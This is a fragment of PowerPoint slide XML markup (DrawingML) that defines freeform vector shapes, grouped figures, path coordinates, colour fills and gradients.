                    <a:gd name="T0" fmla="*/ 236 w 236"/>
                    <a:gd name="T1" fmla="*/ 787 h 787"/>
                    <a:gd name="T2" fmla="*/ 0 w 236"/>
                    <a:gd name="T3" fmla="*/ 0 h 787"/>
                    <a:gd name="T4" fmla="*/ 236 w 236"/>
                    <a:gd name="T5" fmla="*/ 787 h 787"/>
                    <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T9" fmla="*/ 0 w 236"/>
                    <a:gd name="T10" fmla="*/ 0 h 787"/>
                    <a:gd name="T11" fmla="*/ 236 w 236"/>
                    <a:gd name="T12" fmla="*/ 787 h 78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36" h="787">
                      <a:moveTo>
                        <a:pt x="236" y="787"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="7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Line 1139"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1" flipV="1">
                  <a:off x="1476" y="4091"/>
                  <a:ext cx="236" cy="78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03" name="Freeform 879"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="9522187" y="2625687"/>
              <a:ext cx="465583" cy="125711"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                <a:gd name="T1" fmla="*/ 54 h 843"/>
                <a:gd name="T2" fmla="*/ 898 w 3137"/>
                <a:gd name="T3" fmla="*/ 0 h 843"/>
                <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                <a:gd name="T5" fmla="*/ 120 h 843"/>
                <a:gd name="T6" fmla="*/ 0 w 3137"/>
                <a:gd name="T7" fmla="*/ 482 h 843"/>
                <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                <a:gd name="T9" fmla="*/ 843 h 843"/>
                <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                <a:gd name="T11" fmla="*/ 482 h 843"/>
                <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                <a:gd name="T13" fmla="*/ 602 h 843"/>
                <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                <a:gd name="T15" fmla="*/ 54 h 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37" h="843">
                  <a:moveTo>
                    <a:pt x="2887" y="54"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="898" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344" y="843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2688" y="482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3137" y="602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="54"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>
            </a:soli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04" name="Group 2429"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="9523519" y="2024519"/>
              <a:ext cx="1667108" cy="669408"/>
              <a:chOff x="1234" y="2489"/>
              <a:chExt cx="1300" cy="522"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105" name="Freeform 12"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1234" y="2661"/>
                <a:ext cx="1300" cy="350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ACACA"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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06" name="Group 1824"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1740" y="2489"/>
                <a:ext cx="134" cy="319"/>
                <a:chOff x="-3274" y="695"/>
                <a:chExt cx="471" cy="1120"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="123" name="Freeform 1825"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3153" y="1236"/>
                  <a:ext cx="213" cy="579"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 21 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 11 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 206 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 52 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 52 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="48"/>
                        <a:pt x="89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7" y="17"/>
                        <a:pt x="71" y="22"/>
                        <a:pt x="63" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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2" y="49"/>
                        <a:pt x="0" y="182"/>
                        <a:pt x="2" y="206"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="229"/>
                        <a:pt x="43" y="225"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="56"/>
                        <a:pt x="45" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="48"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="48"/>
                        <a:pt x="45" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="56"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207"/>
                        <a:pt x="44" y="211"/>
                        <a:pt x="44" y="211"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="245"/>
                        <a:pt x="87" y="236"/>
                        <a:pt x="88" y="218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="201"/>
                        <a:pt x="88" y="171"/>
                        <a:pt x="89" y="1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1826"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3274" y="849"/>
                  <a:ext cx="471" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 193 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 170 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 101 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 61 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 31 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
                    <a:gd name="T14" fmla="*/ 37 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 55 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 63 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 114 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 170 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 170 h 232"/>
                    <a:gd name="T28" fmla="*/ 139 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 139 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 193 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232">
                      <a:moveTo>
                        <a:pt x="193" y="194"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="190" y="185"/>
                        <a:pt x="172" y="67"/>
                        <a:pt x="170" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="167" y="32"/>
                        <a:pt x="152" y="27"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="114" y="16"/>
                        <a:pt x="101" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="70" y="4"/>
                        <a:pt x="61" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="9" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="181"/>
                        <a:pt x="32" y="184"/>
                        <a:pt x="37" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="55" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="53"/>
                        <a:pt x="54" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="169"/>
                        <a:pt x="57" y="174"/>
                        <a:pt x="63" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="107" y="187"/>
                        <a:pt x="114" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="190"/>
                        <a:pt x="138" y="181"/>
                        <a:pt x="140" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="141"/>
                        <a:pt x="141" y="111"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="139" y="82"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="110"/>
                        <a:pt x="149" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="193" y="194"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="CCFFCC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827"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3274" y="849"/>
                  <a:ext cx="471" cy="548"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 193 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 232"/>
                    <a:gd name="T2" fmla="*/ 170 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 232"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 232"/>
                    <a:gd name="T6" fmla="*/ 101 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 232"/>
                    <a:gd name="T8" fmla="*/ 61 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 232"/>
                    <a:gd name="T10" fmla="*/ 31 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 232"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 232"/>
                    <a:gd name="T14" fmla="*/ 37 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 232"/>
                    <a:gd name="T16" fmla="*/ 55 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 232"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 164 h 232"/>
                    <a:gd name="T20" fmla="*/ 63 w 199"/>
                    <a:gd name="T21" fmla="*/ 175 h 232"/>
                    <a:gd name="T22" fmla="*/ 114 w 199"/>
                    <a:gd name="T23" fmla="*/ 189 h 232"/>
                    <a:gd name="T24" fmla="*/ 140 w 199"/>
                    <a:gd name="T25" fmla="*/ 170 h 232"/>
                    <a:gd name="T26" fmla="*/ 140 w 199"/>
                    <a:gd name="T27" fmla="*/ 170 h 232"/>
                    <a:gd name="T28" fmla="*/ 139 w 199"/>
                    <a:gd name="T29" fmla="*/ 88 h 232"/>
                    <a:gd name="T30" fmla="*/ 136 w 199"/>
                    <a:gd name="T31" fmla="*/ 71 h 232"/>
                    <a:gd name="T32" fmla="*/ 136 w 199"/>
                    <a:gd name="T33" fmla="*/ 70 h 232"/>
                    <a:gd name="T34" fmla="*/ 136 w 199"/>
                    <a:gd name="T35" fmla="*/ 71 h 232"/>
                    <a:gd name="T36" fmla="*/ 139 w 199"/>
                    <a:gd name="T37" fmla="*/ 88 h 232"/>
                    <a:gd name="T38" fmla="*/ 160 w 199"/>
                    <a:gd name="T39" fmla="*/ 204 h 232"/>
                    <a:gd name="T40" fmla="*/ 193 w 199"/>
                    <a:gd name="T41" fmla="*/ 194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9" h="232">
                      <a:moveTo>
                        <a:pt x="193" y="194"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="190" y="185"/>
                        <a:pt x="172" y="67"/>
                        <a:pt x="170" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="167" y="32"/>
                        <a:pt x="152" y="27"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="114" y="16"/>
                        <a:pt x="101" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="70" y="4"/>
                        <a:pt x="61" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="9" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="181"/>
                        <a:pt x="32" y="184"/>
                        <a:pt x="37" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="55" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="53"/>
                        <a:pt x="54" y="122"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="169"/>
                        <a:pt x="57" y="174"/>
                        <a:pt x="63" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="177"/>
                        <a:pt x="107" y="187"/>
                        <a:pt x="114" y="189"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="190"/>
                        <a:pt x="138" y="181"/>
                        <a:pt x="140" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="141"/>
                        <a:pt x="141" y="111"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="79"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="76"/>
                        <a:pt x="139" y="82"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="110"/>
                        <a:pt x="149" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="193" y="194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6" name="Freeform 1828"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3274" y="849"/>
                  <a:ext cx="471" cy="741"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 193 w 199"/>
                    <a:gd name="T1" fmla="*/ 194 h 314"/>
                    <a:gd name="T2" fmla="*/ 170 w 199"/>
                    <a:gd name="T3" fmla="*/ 49 h 314"/>
                    <a:gd name="T4" fmla="*/ 143 w 199"/>
                    <a:gd name="T5" fmla="*/ 24 h 314"/>
                    <a:gd name="T6" fmla="*/ 101 w 199"/>
                    <a:gd name="T7" fmla="*/ 13 h 314"/>
                    <a:gd name="T8" fmla="*/ 61 w 199"/>
                    <a:gd name="T9" fmla="*/ 2 h 314"/>
                    <a:gd name="T10" fmla="*/ 31 w 199"/>
                    <a:gd name="T11" fmla="*/ 12 h 314"/>
                    <a:gd name="T12" fmla="*/ 4 w 199"/>
                    <a:gd name="T13" fmla="*/ 159 h 314"/>
                    <a:gd name="T14" fmla="*/ 37 w 199"/>
                    <a:gd name="T15" fmla="*/ 168 h 314"/>
                    <a:gd name="T16" fmla="*/ 55 w 199"/>
                    <a:gd name="T17" fmla="*/ 47 h 314"/>
                    <a:gd name="T18" fmla="*/ 53 w 199"/>
                    <a:gd name="T19" fmla="*/ 288 h 314"/>
                    <a:gd name="T20" fmla="*/ 63 w 199"/>
                    <a:gd name="T21" fmla="*/ 299 h 314"/>
                    <a:gd name="T22" fmla="*/ 74 w 199"/>
                    <a:gd name="T23" fmla="*/ 302 h 314"/>
                    <a:gd name="T24" fmla="*/ 74 w 199"/>
                    <a:gd name="T25" fmla="*/ 20 h 314"/>
                    <a:gd name="T26" fmla="*/ 90 w 199"/>
                    <a:gd name="T27" fmla="*/ 21 h 314"/>
                    <a:gd name="T28" fmla="*/ 105 w 199"/>
                    <a:gd name="T29" fmla="*/ 28 h 314"/>
                    <a:gd name="T30" fmla="*/ 105 w 199"/>
                    <a:gd name="T31" fmla="*/ 311 h 314"/>
                    <a:gd name="T32" fmla="*/ 114 w 199"/>
                    <a:gd name="T33" fmla="*/ 313 h 314"/>
                    <a:gd name="T34" fmla="*/ 140 w 199"/>
                    <a:gd name="T35" fmla="*/ 294 h 314"/>
                    <a:gd name="T36" fmla="*/ 140 w 199"/>
                    <a:gd name="T37" fmla="*/ 170 h 314"/>
                    <a:gd name="T38" fmla="*/ 139 w 199"/>
                    <a:gd name="T39" fmla="*/ 88 h 314"/>
                    <a:gd name="T40" fmla="*/ 137 w 199"/>
                    <a:gd name="T41" fmla="*/ 75 h 314"/>
                    <a:gd name="T42" fmla="*/ 136 w 199"/>
                    <a:gd name="T43" fmla="*/ 71 h 314"/>
                    <a:gd name="T44" fmla="*/ 136 w 199"/>
                    <a:gd name="T45" fmla="*/ 70 h 314"/>
                    <a:gd name="T46" fmla="*/ 136 w 199"/>
                    <a:gd name="T47" fmla="*/ 71 h 314"/>
                    <a:gd name="T48" fmla="*/ 137 w 199"/>
                    <a:gd name="T49" fmla="*/ 75 h 314"/>
                    <a:gd name="T50" fmla="*/ 139 w 199"/>
                    <a:gd name="T51" fmla="*/ 88 h 314"/>
                    <a:gd name="T52" fmla="*/ 160 w 199"/>
                    <a:gd name="T53" fmla="*/ 204 h 314"/>
                    <a:gd name="T54" fmla="*/ 193 w 199"/>
                    <a:gd name="T55" fmla="*/ 194 h 3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199" h="314">
                      <a:moveTo>
                        <a:pt x="193" y="194"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="190" y="185"/>
                        <a:pt x="172" y="67"/>
                        <a:pt x="170" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="167" y="32"/>
                        <a:pt x="152" y="27"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="21"/>
                        <a:pt x="114" y="16"/>
                        <a:pt x="101" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="10"/>
                        <a:pt x="70" y="4"/>
                        <a:pt x="61" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="0"/>
                        <a:pt x="34" y="4"/>
                        <a:pt x="31" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="17"/>
                        <a:pt x="9" y="139"/>
                        <a:pt x="4" y="159"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="181"/>
                        <a:pt x="32" y="184"/>
                        <a:pt x="37" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="158"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="55" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="53"/>
                        <a:pt x="54" y="246"/>
                        <a:pt x="53" y="288"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="293"/>
                        <a:pt x="57" y="298"/>
                        <a:pt x="63" y="299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="299"/>
                        <a:pt x="70" y="300"/>
                        <a:pt x="74" y="302"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="20"/>
                        <a:pt x="74" y="20"/>
                        <a:pt x="74" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="21"/>
                        <a:pt x="90" y="21"/>
                        <a:pt x="90" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="28"/>
                        <a:pt x="105" y="28"/>
                        <a:pt x="105" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="311"/>
                        <a:pt x="105" y="311"/>
                        <a:pt x="105" y="311"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="312"/>
                        <a:pt x="112" y="312"/>
                        <a:pt x="114" y="313"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="314"/>
                        <a:pt x="138" y="305"/>
                        <a:pt x="140" y="294"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                        <a:pt x="140" y="170"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="141"/>
                        <a:pt x="141" y="111"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="82"/>
                        <a:pt x="138" y="78"/>
                        <a:pt x="137" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="74"/>
                        <a:pt x="137" y="72"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="71"/>
                        <a:pt x="136" y="71"/>
                        <a:pt x="136" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="72"/>
                        <a:pt x="137" y="74"/>
                        <a:pt x="137" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="79"/>
                        <a:pt x="139" y="84"/>
                        <a:pt x="139" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="142" y="110"/>
                        <a:pt x="149" y="150"/>
                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="193" y="1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829"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="-3120" y="823"/>
                  <a:ext cx="156" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
